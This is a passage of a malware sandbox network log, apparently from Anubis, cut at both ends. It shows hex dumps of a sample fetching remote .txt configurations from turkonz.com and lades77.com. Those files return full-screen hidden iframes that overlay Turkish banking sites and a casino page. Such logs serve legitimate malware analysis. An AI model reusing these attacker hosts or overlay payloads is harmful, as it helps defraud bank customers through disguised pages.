730d 0a45 5461 673a 2022 6336 3936 3735    s..ETag: "c69675
3132 3764 6339 313a 6164 3966 6322 0d0a    127dc91:ad9fc"..
5365 7276 6572 3a20 4d69 6372 6f73 6f66    Server: Microsof
742d 4949 532f 362e 300d 0a58 2d50 6f77    t-IIS/6.0..X-Pow
6572 6564 2d42 793a 2050 6c65 736b 5769    ered-By: PleskWi
6e0d 0a58 2d50 6f77 6572 6564 2d42 793a    n..X-Powered-By:
2041 5350 2e4e 4554 0d0a 4461 7465 3a20     ASP.NET..Date: 
4672 692c 2032 3020 4d61 7220 3230 3039    Fri, 20 Mar 2009
2031 313a 3032 3a31 3920 474d 540d 0a0d     11:02:19 GMT...
0a68 7474 703a 2f2f 7777 772e 6c61 6465    .http://www.lade
7337 372e 636f 6d2f 696d 6167 6573 2f6a    s77.com/images/j
732f 7974 656b 2e74 7874                   s/ytek.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 7465    GET /img/jpg/yte
6b2e 7478 7420 4854 5450 2f31 2e31 0d0a    k.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3234 3a31 3820 474d 540d 0a41 6363    4:24:18 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 6336 3936 3735    s..ETag: "c69675
3132 3764 6339 313a 6164 3966 6322 0d0a    127dc91:ad9fc"..
5365 7276 6572 3a20 4d69 6372 6f73 6f66    Server: Microsof
742d 4949 532f 362e 300d 0a58 2d50 6f77    t-IIS/6.0..X-Pow
6572 6564 2d42 793a 2050 6c65 736b 5769    ered-By: PleskWi
6e0d 0a58 2d50 6f77 6572 6564 2d42 793a    n..X-Powered-By:
2041 5350 2e4e 4554 0d0a 4461 7465 3a20     ASP.NET..Date: 
4672 692c 2032 3020 4d61 7220 3230 3039    Fri, 20 Mar 2009
2031 313a 3032 3a31 3920 474d 540d 0a0d     11:02:19 GMT...
0a68 7474 703a 2f2f 7777 772e 6c61 6465    .http://www.lade
7337 372e 636f 6d2f 696d 6167 6573 2f6a    s77.com/images/j
732f 7974 656b 2e74 7874                   s/ytek.txt

from ANUBIS:1087 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 745

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
7465 6b2e 7478 7420 4854 5450 2f31 2e31    tek.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 323a 3230    ar 2009 11:02:20
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 363a 3037    an 2009 04:16:07
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3035 622d 3139 612d 3436 3131 6561 3565    05b-19a-4611ea5e
3465 6663 3022 0d0a 4163 6365 7074 2d52    4efc0"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3431    ntent-Length: 41
300d 0a43 6f6e 7465 6e74 2d54 7970 653a    0..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
7465 6b73 7469 6c62 616e 6b2e 636f 6d2f    tekstilbank.com/
706f 7274 616c 2f69 6e64 6578 2e68 746d    portal/index.htm
2220 0d0a 7769 6474 683d 3130 3025 0d0a    " ..width=100%..
6865 6967 6874 3d31 3030 2520 206d 6172    height=100%  mar
6769 6e68 6569 6768 743d 2230 2220 6d61    ginheight="0" ma
7267 696e 7769 6474 683d 2230 2220 2073    rginwidth="0"  s
6372 6f6c 6c69 6e67 3d22 6e6f 2220 0d0a    crolling="no" ..
626f 7264 6572 3d22 3022 200d 0a66 7261    border="0" ..fra
6d65 626f 7264 6572 3d22 3022 200d 0a74    meborder="0" ..t
6f70 3d22 3022 206c 6566 743d 2230 223e    op="0" left="0">
0d0a 596f 7572 2062 726f 7773 6572 2064    ..Your browser d
6f65 7320 6e6f 7420 7375 7070 6f72 7420    oes not support 
696e 6c69 6e65 2066 7261 6d65 7320 6f72    inline frames or
2069 7320 6375 7272 656e 746c 7920 636f     is currently co
6e66 6967 7572 6564 200d 0a6e 6f74 2074    nfigured ..not t
6f20 6469 7370 6c61 7920 696e 6c69 6e65    o display inline
2066 7261 6d65 732e 0d0a 3c2f 4946 5241     frames...</IFRA
4d45 3e3c 2f64 6976 3e                     ME></div>

from ANUBIS:1088 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 630

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 7465    GET /img/jpg/yte
622e 7478 7420 4854 5450 2f31 2e31 0d0a    b.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3234 3a30 3920 474d 540d 0a41 6363    4:24:09 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3732 3766 3336    s..ETag: "727f36
6631 3237 6463 3931 3a61 6439 6663 220d    f127dc91:ad9fc".
0a53 6572 7665 723a 204d 6963 726f 736f    .Server: Microso
6674 2d49 4953 2f36 2e30 0d0a 582d 506f    ft-IIS/6.0..X-Po
7765 7265 642d 4279 3a20 506c 6573 6b57    wered-By: PleskW
696e 0d0a 582d 506f 7765 7265 642d 4279    in..X-Powered-By
3a20 4153 502e 4e45 540d 0a44 6174 653a    : ASP.NET..Date:
2046 7269 2c20 3230 204d 6172 2032 3030     Fri, 20 Mar 200
3920 3131 3a30 323a 3230 2047 4d54 0d0a    9 11:02:20 GMT..
0d0a 6874 7470 3a2f 2f77 7777 2e6c 6164    ..http://www.lad
6573 3737 2e63 6f6d 2f69 6d61 6765 732f    es77.com/images/
6a73 2f79 7465 622e 7478 74                js/yteb.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 7465    GET /img/jpg/yte
622e 7478 7420 4854 5450 2f31 2e31 0d0a    b.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3234 3a30 3920 474d 540d 0a41 6363    4:24:09 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3732 3766 3336    s..ETag: "727f36
6631 3237 6463 3931 3a61 6439 6663 220d    f127dc91:ad9fc".
0a53 6572 7665 723a 204d 6963 726f 736f    .Server: Microso
6674 2d49 4953 2f36 2e30 0d0a 582d 506f    ft-IIS/6.0..X-Po
7765 7265 642d 4279 3a20 506c 6573 6b57    wered-By: PleskW
696e 0d0a 582d 506f 7765 7265 642d 4279    in..X-Powered-By
3a20 4153 502e 4e45 540d 0a44 6174 653a    : ASP.NET..Date:
2046 7269 2c20 3230 204d 6172 2032 3030     Fri, 20 Mar 200
3920 3131 3a30 323a 3230 2047 4d54 0d0a    9 11:02:20 GMT..
0d0a 6874 7470 3a2f 2f77 7777 2e6c 6164    ..http://www.lad
6573 3737 2e63 6f6d 2f69 6d61 6765 732f    es77.com/images/
6a73 2f79 7465 622e 7478 74                js/yteb.txt

from ANUBIS:1089 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 736

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
7465 622e 7478 7420 4854 5450 2f31 2e31    teb.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 323a 3232    ar 2009 11:02:22
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 353a 3538    an 2009 04:15:58
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3035 612d 3139 312d 3436 3131 6561 3535    05a-191-4611ea55
6239 6238 3022 0d0a 4163 6365 7074 2d52    b9b80"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
310d 0a43 6f6e 7465 6e74 2d54 7970 653a    1..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
7465 622e 636f 6d2e 7472 2f64 6566 6175    teb.com.tr/defau
6c74 2e61 7370 7822 200d 0a77 6964 7468    lt.aspx" ..width
3d31 3030 250d 0a68 6569 6768 743d 3130    =100%..height=10
3025 2020 6d61 7267 696e 6865 6967 6874    0%  marginheight
3d22 3022 206d 6172 6769 6e77 6964 7468    ="0" marginwidth
3d22 3022 2020 7363 726f 6c6c 696e 673d    ="0"  scrolling=
226e 6f22 200d 0a62 6f72 6465 723d 2230    "no" ..border="0
2220 0d0a 6672 616d 6562 6f72 6465 723d    " ..frameborder=
2230 2220 0d0a 746f 703d 2230 2220 6c65    "0" ..top="0" le
6674 3d22 3022 3e0d 0a59 6f75 7220 6272    ft="0">..Your br
6f77 7365 7220 646f 6573 206e 6f74 2073    owser does not s
7570 706f 7274 2069 6e6c 696e 6520 6672    upport inline fr
616d 6573 206f 7220 6973 2063 7572 7265    ames or is curre
6e74 6c79 2063 6f6e 6669 6775 7265 6420    ntly configured 
0d0a 6e6f 7420 746f 2064 6973 706c 6179    ..not to display
2069 6e6c 696e 6520 6672 616d 6573 2e0d     inline frames..
0a3c 2f49 4652 414d 453e 3c2f 6469 763e

from ANUBIS:1090 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 630

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6361    GET /img/jpg/yca
732e 7478 7420 4854 5450 2f31 2e31 0d0a    s.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3232 3a33 3120 474d 540d 0a41 6363    4:22:31 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3836 3936 3833    s..ETag: "869683
3531 3237 6463 3931 3a61 6439 6663 220d    5127dc91:ad9fc".
0a53 6572 7665 723a 204d 6963 726f 736f    .Server: Microso
6674 2d49 4953 2f36 2e30 0d0a 582d 506f    ft-IIS/6.0..X-Po
7765 7265 642d 4279 3a20 506c 6573 6b57    wered-By: PleskW
696e 0d0a 582d 506f 7765 7265 642d 4279    in..X-Powered-By
3a20 4153 502e 4e45 540d 0a44 6174 653a    : ASP.NET..Date:
2046 7269 2c20 3230 204d 6172 2032 3030     Fri, 20 Mar 200
3920 3131 3a30 323a 3231 2047 4d54 0d0a    9 11:02:21 GMT..
0d0a 6874 7470 3a2f 2f77 7777 2e6c 6164    ..http://www.lad
6573 3737 2e63 6f6d 2f69 6d61 6765 732f    es77.com/images/
6a73 2f79 6361 732e 7478 74                js/ycas.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6361    GET /img/jpg/yca
732e 7478 7420 4854 5450 2f31 2e31 0d0a    s.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3232 3a33 3120 474d 540d 0a41 6363    4:22:31 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3836 3936 3833    s..ETag: "869683
3531 3237 6463 3931 3a61 6439 6663 220d    5127dc91:ad9fc".
0a53 6572 7665 723a 204d 6963 726f 736f    .Server: Microso
6674 2d49 4953 2f36 2e30 0d0a 582d 506f    ft-IIS/6.0..X-Po
7765 7265 642d 4279 3a20 506c 6573 6b57    wered-By: PleskW
696e 0d0a 582d 506f 7765 7265 642d 4279    in..X-Powered-By
3a20 4153 502e 4e45 540d 0a44 6174 653a    : ASP.NET..Date:
2046 7269 2c20 3230 204d 6172 2032 3030     Fri, 20 Mar 200
3920 3131 3a30 323a 3231 2047 4d54 0d0a    9 11:02:21 GMT..
0d0a 6874 7470 3a2f 2f77 7777 2e6c 6164    ..http://www.lad
6573 3737 2e63 6f6d 2f69 6d61 6765 732f    es77.com/images/
6a73 2f79 6361 732e 7478 74                js/ycas.txt

from ANUBIS:1091 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 742

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
6361 732e 7478 7420 4854 5450 2f31 2e31    cas.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 323a 3233    ar 2009 11:02:23
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 323a 3536    an 2009 04:12:56
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3034 392d 3139 372d 3436 3131 6539 6138    049-197-4611e9a8
3238 3230 3022 0d0a 4163 6365 7074 2d52    28200"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
370d 0a43 6f6e 7465 6e74 2d54 7970 653a    7..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
6361 7369 6e6f 6575 726f 3235 2e63 6f6d    casinoeuro25.com
2f74 722f 696e 6465 782e 6a73 7022 200d    /tr/index.jsp" .
0a77 6964 7468 3d31 3030 250d 0a68 6569    .width=100%..hei
6768 743d 3130 3025 2020 6d61 7267 696e    ght=100%  margin
6865 6967 6874 3d22 3022 206d 6172 6769    height="0" margi
6e77 6964 7468 3d22 3022 2020 7363 726f    nwidth="0"  scro
6c6c 696e 673d 226e 6f22 200d 0a62 6f72    lling="no" ..bor
6465 723d 2230 2220 0d0a 6672 616d 6562    der="0" ..frameb
6f72 6465 723d 2230 2220 0d0a 746f 703d    order="0" ..top=
2230 2220 6c65 6674 3d22 3022 3e0d 0a59    "0" left="0">..Y
6f75 7220 6272 6f77 7365 7220 646f 6573    our browser does
206e 6f74 2073 7570 706f 7274 2069 6e6c     not support inl
696e 6520 6672 616d 6573 206f 7220 6973    ine frames or is
2063 7572 7265 6e74 6c79 2063 6f6e 6669     currently confi
6775 7265 6420 0d0a 6e6f 7420 746f 2064    gured ..not to d
6973 706c 6179 2069 6e6c 696e 6520 6672    isplay inline fr
616d 6573 2e0d 0a3c 2f49 4652 414d 453e    ames...</IFRAME>
3c2f 6469 763e                             </div>

from ANUBIS:1092 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 312 - Transferred inbound Bytes: 628

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 612e    GET /img/jpg/ya.
7478 7420 4854 5450 2f31 2e31 0d0a 436f    txt HTTP/1.1..Co
6e74 656e 742d 5479 7065 3a20 7465 7874    ntent-Type: text
2f68 746d 6c0d 0a48 6f73 743a 2077 7777    /html..Host: www
2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a 4163    .turkonz.com..Ac
6365 7074 3a20 7465 7874 2f68 746d 6c2c    cept: text/html,
202a 2f2a 0d0a 5573 6572 2d41 6765 6e74     */*..User-Agent
3a20 4d6f 7a69 6c6c 612f 332e 3020 2863    : Mozilla/3.0 (c
6f6d 7061 7469 626c 653b 2049 6e64 7920    ompatible; Indy 
4c69 6272 6172 7929 0d0a 0d0a              Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2033 390d 0a43 6f6e 7465 6e74 2d54 7970     39..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3231 3a34 3120 474d 540d 0a41 6363    4:21:41 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3436 3539 3465    s..ETag: "46594e
3137 3132 3764 6339 313a 6164 3966 6322    17127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3032 3a32 3320 474d 540d    09 11:02:23 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7961 2e74 7874                   /js/ya.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 612e    GET /img/jpg/ya.
7478 7420 4854 5450 2f31 2e31 0d0a 436f    txt HTTP/1.1..Co
6e74 656e 742d 5479 7065 3a20 7465 7874    ntent-Type: text
2f68 746d 6c0d 0a48 6f73 743a 2077 7777    /html..Host: www
2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a 4163    .turkonz.com..Ac
6365 7074 3a20 7465 7874 2f68 746d 6c2c    cept: text/html,
202a 2f2a 0d0a 5573 6572 2d41 6765 6e74     */*..User-Agent
3a20 4d6f 7a69 6c6c 612f 332e 3020 2863    : Mozilla/3.0 (c
6f6d 7061 7469 626c 653b 2049 6e64 7920    ompatible; Indy 
4c69 6272 6172 7929 0d0a 0d0a              Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2033 390d 0a43 6f6e 7465 6e74 2d54 7970     39..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3231 3a34 3120 474d 540d 0a41 6363    4:21:41 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3436 3539 3465    s..ETag: "46594e
3137 3132 3764 6339 313a 6164 3966 6322    17127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
